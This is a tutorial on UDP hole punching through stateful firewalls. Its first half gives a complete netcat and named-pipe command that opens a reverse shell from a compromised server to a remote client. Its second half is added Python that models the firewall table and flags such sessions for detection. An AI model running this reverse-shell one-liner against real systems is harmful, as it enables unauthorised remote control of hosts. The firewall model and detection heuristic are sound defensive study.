The following example demonstrates how to punch a hole through a stateful firewall using UDP: an outbound UDP packet creates a connection-table entry, and the firewall then accepts the inbound traffic that matches the reverse of that entry. It opens a reverse shell on the server.
- Server: The target machine on which the shell will be opened.
- Client: The machine used to remotely connect to the shell.
- Server IP: 192.0.2.10
- Client IP: 198.51.100.15
- Remote code execution must already be possible on the server.
- Both machines must have netcat installed: sudo apt install netcat
- Use the following command on either machine to troubleshoot network issues (it shows the UDP packets on port 12345 to and from the server):
sudo tcpdump -i any -n -l host 192.0.2.10 and udp and port 12345 -X
nc -uvp 12345 198.51.100.15 5555 || rm /tmp/bp 2>/dev/null; mknod /tmp/bp p; /bin/sh 0</tmp/bp | nc -l -uvp 12345 1>/tmp/bp
This command:
- initiates a UDP connection to the client so that the firewall creates a new entry for the 5-tuple (192.0.2.10:12345 -> 198.51.100.15:5555, UDP) in its connection table:
nc -uvp 12345 198.51.100.15 5555
- creates a named pipe (FIFO) that serves as the communication channel between the shell and the UDP tunnel:
mknod /tmp/bp p
- creates a UDP listener on the same source port that waits for the client connection:
nc -ulvnp 12345
  -l: listen for incoming connections
  -n: do not perform domain name resolution
  -p 12345: source/listen port
  -u: use UDP
  -v: verbose
Connect to the server from the client, using source port 5555 so the packets match the reverse of the connection-table entry:
nc -uvp 5555 192.0.2.10 12345
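Seen from the firewall side, the mechanism above is just a connection-table entry created by the server's first outbound packet. The following is an added example, not code from the original page: it models a stateful UDP filter's table with an idle timeout, replays the page's exchange through it (the client's reply is allowed only because it is the exact reverse tuple and only while the entry is alive), and then runs a simple detection heuristic over constructed flow records that flags outbound-initiated UDP sessions to unexpected ports that keep carrying inbound traffic for a long time. The timeout value, the allow-list of expected UDP ports, the minimum session duration and the flow-record format are all assumptions made for this example.

```python
from collections import namedtuple

# Constructed packet/flow record. direction is "out" (leaving the protected
# server) or "in" (arriving from outside). Addresses are the page's examples.
Packet = namedtuple("Packet", "t direction src_ip src_port dst_ip dst_port")

SERVER, CLIENT = "192.0.2.10", "198.51.100.15"
UDP_TIMEOUT = 30  # assumed idle timeout (seconds) for a UDP table entry


class StatefulUdpFilter:
    """Minimal model of a stateful firewall's UDP connection table.

    Policy: outbound UDP is allowed and creates an entry; inbound UDP is allowed
    only if it is the exact reverse of a live entry; anything else is dropped.
    """

    def __init__(self, timeout=UDP_TIMEOUT):
        self.timeout = timeout
        self.table = {}  # (src_ip, src_port, dst_ip, dst_port) -> last seen time

    def _expire(self, now):
        self.table = {k: v for k, v in self.table.items() if now - v <= self.timeout}

    def filter(self, pkt):
        self._expire(pkt.t)
        key = (pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        if pkt.direction == "out":
            self.table[key] = pkt.t          # outbound packet punches the hole
            return "ALLOW"
        reverse = (pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port)
        if reverse in self.table:
            self.table[reverse] = pkt.t      # matching reply refreshes the timer
            return "ALLOW"
        return "DROP"                        # unsolicited inbound UDP


def replay_page_exchange():
    """Replay the page's exchange plus two cases the firewall rejects."""
    fw = StatefulUdpFilter()
    trace = [
        Packet(0, "out", SERVER, 12345, CLIENT, 5555),   # server's first nc creates the entry
        Packet(1, "in", CLIENT, 5555, SERVER, 12345),    # client's connect: reverse tuple, allowed
        Packet(2, "in", CLIENT, 6000, SERVER, 12345),    # wrong source port: no entry, dropped
        Packet(1 + UDP_TIMEOUT + 1, "in", CLIENT, 5555, SERVER, 12345),  # after idle timeout
    ]
    return [fw.filter(p) for p in trace]   # ["ALLOW", "ALLOW", "DROP", "DROP"]


# Assumed allow-list of UDP ports the protected host is expected to talk to.
EXPECTED_UDP_PORTS = {53, 123, 443, 500, 4500}


def find_suspicious_udp_sessions(packets, min_duration=60, expected_ports=EXPECTED_UDP_PORTS):
    """Flag outbound-initiated UDP sessions to unexpected ports that then carry
    inbound traffic for at least min_duration seconds: the shape an interactive
    session over a punched hole has, unlike a one-shot DNS or NTP exchange."""
    first_out, last_in = {}, {}
    for p in packets:
        if p.direction == "out":
            key = (p.src_ip, p.src_port, p.dst_ip, p.dst_port)
            first_out.setdefault(key, p.t)
        else:
            key = (p.dst_ip, p.dst_port, p.src_ip, p.src_port)
            if key in first_out:
                last_in[key] = p.t
    return [key for key, t0 in first_out.items()
            if key[3] not in expected_ports
            and key in last_in and last_in[key] - t0 >= min_duration]


# Constructed flow records: a normal DNS lookup, then the page's UDP shell.
SAMPLE_FLOWS = [
    Packet(0.00, "out", SERVER, 40000, "203.0.113.53", 53),
    Packet(0.02, "in", "203.0.113.53", 53, SERVER, 40000),
    Packet(10, "out", SERVER, 12345, CLIENT, 5555),
    Packet(11, "in", CLIENT, 5555, SERVER, 12345),
    Packet(60, "in", CLIENT, 5555, SERVER, 12345),
    Packet(130, "in", CLIENT, 5555, SERVER, 12345),
]

if __name__ == "__main__":
    print(replay_page_exchange())
    print(find_suspicious_udp_sessions(SAMPLE_FLOWS))
```

The model makes the defensive point explicit: the hole exists only for the exact reverse 5-tuple and only until the entry idles out, so shortening the UDP timeout and restricting which outbound UDP destinations are allowed both narrow it, and the heuristic singles out the long-lived session on a non-standard port while leaving the short DNS exchange alone.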